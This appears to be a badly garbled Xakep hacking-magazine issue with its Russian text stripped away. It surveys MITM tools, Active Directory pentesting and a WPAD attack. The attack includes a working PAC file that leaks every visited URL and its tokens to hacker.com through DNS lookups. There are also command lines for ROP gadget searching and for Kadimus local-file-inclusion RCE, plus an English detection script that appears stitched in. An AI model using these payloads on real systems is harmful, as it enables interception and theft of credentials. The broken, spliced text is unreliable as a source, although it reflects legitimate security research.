    (https://xakep.ru/2014/09/08/password-manager-pentest/).,,(ZhiweiLi).-.,-.:CSRF(LastPass,RoboForm,NeedMyPassword)XSS(NeedMyPassword).

    :goo.gl/H4TM2q


    , , ,-.-IT-,:).

    ,-,RC2,RC4,RC5,.RSA.-,-.

    , , RSA.

    , - --,,.- .

    . , - Windows, Microsoft. - - Microsoft Windows, SysinternalsProcessExplorerRootkitRevealer.,:https://xakep.ru/2009/05/12/48169/.

    , Blowfish, -.SchneieronSecurity:DataandGoliath,-.


  • 2. Moscone- . full pass, -, , , 2100 ,., ,-.(-).

    .,,-. , ,--.

    ,-(!), . , :, . . -, . , ,,, 70% -.

    IoT (Internet of Things) CCTV- -RomPager,-

    INFO

    - - Wi-Fi, . - , ,

    Wireshark,

    ,

    :).

    -2012., , (https://xakep.ru/2012/12/30/kris-kasperski/), . , (,-,,,:).. .).

    McAfee. , , ,McAfee,,,-:).

    -.

    !, (),-SpartanRifleLWRC,. -(),.

    CheckPoint,-(;)),.,!

    , 70%


  • , .

    (POS) , . , - , PHP-,(), , .:,,.-,...

    ()-. . -:201337%,,201545%.-.5%,,-.,..-,.IT.

    , . . ,,.

    , ,,,,.

    ,( ). (top-ratedspeaker), . , . - SysinternalsTools, ,.-,2009-ProcessExplorer(,proofofconcept,).(- , - , , . , ).,--2012(blogs.technet.com/b/markrussinovich/archive/2012/01/05/3473797.aspx) RSA 2015-.-,,(), -.,ProcMon, ProcMon -,XML-,.-/.

    .,-Kill,-. . ,.- suspend. , -.,--.Kill.,Windows10,,,.

    , . ,, - . - , , -., , .

    INFO

    216

    4.

    -

    ,

    ,

    Asus Eee

    PC 1001px. -

    -

    ... , -

    windows XP!

    , 2009 Process Explorer

  • . - , -, . , , , - . , . , , . , .

    -, - - . , , , , , .

    () - , -. - . - - - , .

    (Active Directory, Lotus Domino, LDAP, Novell ).

    (penetration testing) - . - , - , - . - , , , .

    ,

    - , . . . , , - . - , - , 60 .

    . - - , (, Active Directory). - -. - , . , , -, SNMP, RW. -, Oracle !

    , .

    . ,

    white hat, , - -, ,

    X@ygoltsev

    Intro - , . , , , -, , . ( ) : , , . , - , . , Offensive Security -


  • , , - .

    -, , . - - . , - Active Directory, , , - . , ( AES), , , - (j.mp/NCrOZU). , , - .

    Active Directory, Windows.

    - . , - .

    WIndoWs Windows - Active Directory. - , , (, SMB Relay) (, mimikatz). , Domain Admins .

    Windows.

    - , - , . . , .

    Web Proxy Auto dIscovery Internet Explorer. , , , - wpad.domain.name. . WPAD .

    WPAD DNS, , , , .

    NBNS WPAD.

    , , http://wpad/wpad.dat.

    , - -. wpad.domain.name, , , , WPAD NBNS . MITM , , ARP Poisoning.

    Windows.

    , - ( WPAD). Active Directory. -: User configuration Windows Settings Internet Explorer Maintenance Connection Automatic Browser Configuration Automatically detect configuration setting. .

    / , - , - , Hack.Tool. . .

    Windows.

    - -, - .

    , . , , . , - , . . , . , , - - , - .

    .

    -. , - , . IP-, . , - .

    -. .

    Windows UNIx.

    . - , . , - .

    outro , , - , . - - , - . -, .

    Vulnerability Assessment

    (bit.ly/17lVCDU) Open Source Security Testing

    Methodology Manual (bit.ly/U9WpQY) The Penetration Testing Execution

    Standard (bit.ly/1KNe7iF)

    PentesterLab (bit.ly/1uJ3RUu) Penetration Testing Practice Lab

    (bit.ly/1fb61kO)

    Open Penetration Testing Bookmarks

    Collection (bit.ly/1vncteH)

    , Active Directory (bit.ly/1cezrBb)

    WPAD Man in the Middle (bit.ly/1InN9OL)


  • MITMf(goo.gl/LdxWWY) . - man-in-the-middle , sergio-proxy. Kali Linux. - (goo.gl/LdxWWY) :

# setup.sh
# pip install -r requirements.txt

    . : Spoof -

    ARP/DHCP-, ICMP-;

    Sniffer - ;

    BeEFAutorun BeEF, ;

    AppCachePoison ;

    SessionHijacking - ;

    BrowserProfiler ;

    FilePwn HTTP - Backdoor Factory BDFProxy;

    Inject HTML-; jskeylogger JavaScript- .

    , , .

    -. .

    , - , . -

    . -,

    , MITM-.

    MITM-

    ant [email protected], @svv00p


    ARP spoofing MITMf


  • PuttyRider

    PuttyRider

    PuTTyRIdeR (goo.gl/xZpsbV) . , - -, -. , , - - Linux/UNIX-, SSH/Telnet/rlogin. - , . , PuTTY - . ( ), shell- . (). , - PuTTY, - (goo.gl/5MQdzW).

    Sessionthief

    sessIonThIef (goo.gl/VP51xA) , . . - ( - ) ARP poisoning. - , , , , Yahoo Facebook, SSL-, . , - , SSL, - . , Firefox - . - , :

# apt-get install build-essential libwxgtk2.8-dev libgtk2.0-dev libpcap-dev
# g++ $(wx-config --cppflags --libs) -lpcap -o sessionthief *.cpp
# setcap cap_net_raw,cap_net_admin=eip sessionthief

    dsnIff(goo.gl/umyYJW)Dsniff , , - , , , : -/, . : arpspoof , ; dnsspoof arpspoof DNS-

    DNS- ; dsniff (password sniffer), -

    , Telnet, FTP, SMTP, POP (Post Office Protocol), IMAP (Internet Message Access Protocol), HTTP, CVS, Citrix, SMB (Server Message Block), Oracle ;

    filesnarf tcpdump NFS-;

    macof MAC- , , -, , dsniff ;

    sshmitm SSH-, , .

    . , . , -, -. Dsniff


  • MITMPRoxy(goo.gl/ISdbbM) , - HTTP-. /, -, , , -. , - . mitmproxy REST API, .

    :

    $ sudo aptitude install mitmproxy

    $ pip install mitmproxy

    $ easy_install mitmproxy

    , mitmproxy HTTPS-, . , , - : goo.gl/FLcaiS.

    Intercepter-NG

    InTeRcePTeR-nG(goo.gl/r9n2jz) , . , ( - ) - . -, MITM, -, . - . -, , . -, - , , nix- - (, , Wine GUI). - MITM. . ARP poison. ( DNS/NBNS/LLMNR). DNS over ICMP Redirect, ICMP Redirect. DHCP MITM, SSL MITM + SSLStrip, WPAD, HTTP Injection, SSH-MITM. , - Windows , MITM (SSLStrip, SSL MITM, SMB hijack, LDAP relay, HTTP injection) . . , , .

    Mitmproxy

    PRoxyfuzz (goo.gl/C9B0AY) MITM- ProzyFuzz - . , - . , , - . TCP UDP. , . , -- ( ) PoC. :

    python proxyfuzz -l -r -p [options]

    : w ,

    ; c ( ); s ( ); u UDP- ( TCP).

    The MIddleR(goo.gl/Gf3AlT) DEF CON - MITM- . - - HTTP : plugin-beef.py Browser Exploitation Framework (BeEF)

    HTTP-, ; plugin-metasploit.py (HTTP)

    IFRAME, Metasploit;

    plugin-keylogger.py JavaScript onKeyPress , - HTTPS, , .

    The Middler , - , . - - ( ), . : scapy, libpcap, readline, libdnet, python-netfilter. , , - .


  • eTTeRcaP(goo.gl/DF9xJ4) , - , MITM-. - , , - . - , - - . ][, : goo.gl/0CpUko.

    Subterfuge

    subTeRfuGe(goo.gl/0VKemE) Windows - MITM-, Intercepter-NG: , . , - Windows Linux MITM- (SSLStrip, SSL MITM, SMB hijack, LDAP relay, HTTP injection). nix- . MITM - (, Ettercap, Arpspoof, SSLStrip), . Subterfuge, , , DEF CON 20. , : SubterfugePublicBeta5.0.tar.gz. -

tar -zxvf /root/Desktop/SubterfugePublicBeta5.0.tar.gz -C /root/Desktop
cd /root/Desktop/subterfuge
python install.py

    , . , -, subterfuge, - 127.0.0.1. Start , Subterfuge , . , Settings. , -: Session Hijacking: ,

    -; HTTP code injection: -

    ; Evilgrade: Evilgrade -

    .

    KaRMa (goo.gl/mEIHc3) , - . , KARMA , , -, 802.11 Probe Request , / . Evil Twin, MITM. - , -, -, , . , , , -, , AP, - . : , , - ? , - , . -, , WiFi Pineapple Mark IV. KARMA -: Pwnie Express, Kali Linux, Snoopy, Jasager.

    aIRJacK(goo.gl/TM9niF) , , ( , ) 802.11 . - . , , AirJack , ( DoS- MITM-), - SSID .

    Ettercap

    Lenovo. Superfish, - -. , SSL- - . , Superfish Inc. - Superfish : MITM;

    (SHA-1, 1024- RSA) ; ; -

    ; -; .

    , - MITM-. , - .

    SuperfiSh

    In The end , , -, , , , - . , - MITM- , , - , . nix- . , , credentials. , :).


  • WPAD--.,,,-,-HTTPS-.

    WPAD WPAD

    @cdump, [email protected]


  • PAC-,URL,-,.:

function FindProxyForURL(url, host) {
    if (host == "xakep.ru") {
        return "PROXY proxy.com:8080";
    } else if (host == "microsoft.com") {
        return "PROXY anotherproxy.com:5050";
    } else {
        return "DIRECT";
    }
}

    FindProxyForURL, PAC- - . , , -, -google.com proxy1.com, proxy2.com,- , --.

    PAC-- - , Firefox - URL. - . -WPAD.

    WPAD WPAD PAC- DHCP- ( ), HTTP- http://wpad.%domain%/wpad.dat. - wpad.dat -.

    , DHCP,msk.office.work. WindowsXPwpad.msk.office.work ( -

    WPAD(WebProxyAutoDiscoveryprotocol),-PAC(ProxyAutoConfig),JavaScript,-, URL. FindProxyForURL

[Fig. 1: Windows XP; Fig. 2: Windows 7]


  • DNS),wpad.office.work. http://wpad.msk.office.work/wpad.dat(DNS) http://wpad.office.work/wpad.dat(DNS)

    Windows7-:DNS- , WPADLink-Local Multicast Name Resolution,-NetBIOS Name Service.- , WindowsVista. http://wpad.msk.office.work/wpad.dat(DNS) http://wpad/wpad.dat(LLMNR) http://wpad/wpad.dat(NBNS)

    -, -. -NetBIOS,-NBNS-Metasploit(.3).

    -,WINS-, Windows-WPAD,-WINS-.-: ,, /24, -IP.

    861 . .com,.net,.ru,.org,-

    .work.school.ninja.vodka.-domain-nameDHCP-.,domain-name .school-wpad.school,WPAD-.,wpad.TLD,(.4).

    wpad.co, --wpad.dat. , : wpad.work. -3901IP.

    Profit?,- -. ? HTTP-:-,,cookies,.

    HTTPSCONNECT.-user-agent.-, , handshake,-.

    BAcktoPAc PAC-JavaScript, window,document,

[Fig. 3: NBNS; Fig. 4: WPAD; Fig. 5: wpad.work; Fig. 6: HTTP]


  • , -: Chrome , , (GET-), Firefox (location.hash). , URLhttp://mail.ru/?a=123#token=secret(..910).

    ,-,- URL. , isResolvable, URL. URL , -,d.wpad.work,NS-DNS-,-.

    ,-:

function encode(str) {
    r = str.toLowerCase()
        .replace(/([^a-z1-9])/g, function(m) {
            return "0" + m.charCodeAt(0)
        })
        .replace(/([^\.]{60})(.)/g, '$1.$2')
        .substr(0, 240);
    return r + (r.slice(-1) != "." ? "." : "") + "hacker.com";
}

function FindProxyForURL(url, host) {
    var u = encode(url);
    return isResolvable(u) ? "DIRECT" : "DIRECT";
}

    URLhttps://example.ru/?token=123- https058047047example046ru047063token061123.hacker.com,,-Perl:

echo 'https058047047example046ru047063token061123.hacker.com' \
    | perl -lape 's/\.hacker\.com$//; s/\.//g; s/0(..)/chr($1)/eg;'
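The Perl one-liner above decodes one name by hand; as an added example (not from the article), here is the same decoding in Python applied to a constructed BIND-style query log, so that a resolver operator can spot lookups under the attacker's domain and recover the URLs a poisoned PAC file leaked. The log lines are constructed, the .hacker.com suffix is the one the article's PAC file uses, and the decoder shares the Perl version's limit of two-digit character codes.

```python
import re

# Domain the article's PAC file appends to every encoded URL.
EXFIL_SUFFIX = ".hacker.com"

# Constructed BIND-style query-log lines for the example (not from the article).
SAMPLE_QUERY_LOG = """\
26-May-2015 10:12:01.101 queries: info: client 10.0.0.15#51234: query: https058047047example046ru047063token061123.hacker.com IN A + (10.0.0.2)
26-May-2015 10:12:03.330 queries: info: client 10.0.0.15#51235: query: www.microsoft.com IN A + (10.0.0.2)
26-May-2015 10:12:04.902 queries: info: client 10.0.0.21#40011: query: https058047047mail046ru047063a061123035token061secret.hacker.com IN A + (10.0.0.2)
"""

QUERY_RE = re.compile(r"client (?P<client>[\d.]+)#\d+: query: (?P<qname>\S+) IN ")


def decode_pac_label(qname, suffix=EXFIL_SUFFIX):
    """Invert the PAC file's encode(): strip the suffix, drop the dots it
    inserts every 60 characters, then map each '0' + two-digit char code back
    to its character. Returns None when qname is not under the suffix.
    Like the Perl one-liner this assumes two-digit codes (ASCII 10..99);
    characters above 99 such as '{' or '~' would be mis-decoded."""
    if not qname.lower().endswith(suffix):
        return None
    body = qname[:-len(suffix)].replace(".", "")
    # A literal '0' is encoded as '048', so a '0' followed by two digits is
    # always an escape and never plain URL text.
    return re.sub(r"0(\d\d)", lambda m: chr(int(m.group(1))), body)


def find_exfiltrated_urls(log_text, suffix=EXFIL_SUFFIX):
    """Return (client_ip, decoded_url) for every lookup under the suffix."""
    hits = []
    for line in log_text.splitlines():
        m = QUERY_RE.search(line)
        if not m:
            continue
        url = decode_pac_label(m.group("qname"), suffix)
        if url is not None:
            hits.append((m.group("client"), url))
    return hits


if __name__ == "__main__":
    for client, url in find_exfiltrated_urls(SAMPLE_QUERY_LOG):
        print(client, url)
```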

    ,URL(location.hash)-OAuth-. , -Firefox.

    WPAD , HTTPS, -,OAuthURL.,-wpad.LTD.

    , , , WPAD.,-: .

    .local,,-broadcast-,,Bonjour.-,.

    wpad. -

    (IEChrome).

    alert (-)..

    isResolvable,-IP-.:

    if (isResolvable(host)) return "PROXY proxy.com:8080";

    ? , , FindProxyForURLURL.-

[Fig. 7: HTTPS; Fig. 8: JavaScript in the PAC file; Fig. 9: FindProxyForURL in Chrome; Fig. 10: FindProxyForURL in Firefox]


  • Dylib Hijack Scanner DLL hijack Windows, , . : , - DLL- DLL (Microsoft Security Advisory 2269637). , Mac, dylib-. - : LC_LOAD_WEAK_DYLIB; @RPATHS; LC_LOAD_DYLIB + LC_RPATH.

    , , - - , - , , .

    Dylib hijack scanner (DHS) , - , dylib hijacking .

    - Mac, iCloud Photos, Xcode, Word, Excel, Dropbox .

    - DLL Hijacking on OS X? #@%& Yeah! (ht tps://s3.amazonaws.com/s3.synack.com/canSecW.pdf) CanSecWest 2015.

    rop-toolRop-tool , . - , - .

    : gadget ROP-; patch -

    ; info

    ; search

    .

    : , , ; ; Intel AT&T ; ELF, PE MACH-O; big little endian; x86 x86_64.

    - Capstone.

    :

# rop-tool g ./program
# rop-tool s ./program -s "/bin/sh"
# rop-tool s ./program -a
# rop-tool p ./program -o 0x1000 -b "\xaa\xbb\xcc\xdd" -O patched

    lFi Kadimus LFI (Local File Inclusion) - .

    : URL-; /var/log/auth.log RCE; /proc/self/environ RCE; php://input RCE; data://text RCE; ; ; shell- HTTP-

    ; (socks4://, socks4a://,

    socks5://, socks5h:// http://); socks5 bind connections.

    :

    ./kadimus -U url_list.txt --threads 10 --connect-timeout 10 --retry-times 0

    :

    ./kadimus -t localhost/?pg=contact -G -f "index.php%00" -O local_output.php --inject-at pg

    PHP-:

    ./kadimus -t localhost/?pg=php://input%00 -C '' -X input

    RFI (Remote File Inclusion) .

    X-toolS

    D1g1 Digital Security

    @evdokimovds

    : Patrick Wardle: MacURL: https://objective-see.com/products/dhs.html

    : t00sh: LinuxURL: https://github.com/t00sh/rop-tool

    : P0cL4bs Team: LinuxURL: https://github.com/P0cL4bs/Kadimus


  • victimS verSion SearcH Java- , - - . , .

    Victims-version-search Python-, - JAR-. - victims-cve-db (https://github.com/victims/victims-cve-db). - , - .

    - :1. Maven manifest (pom.xml), -

    .2.

    artifactId.3. META-INF/MANIFEST.MF

    artifactId.

    : Python 2.6+; PyYAML; SQLite 3; victims-cve-db .

    - .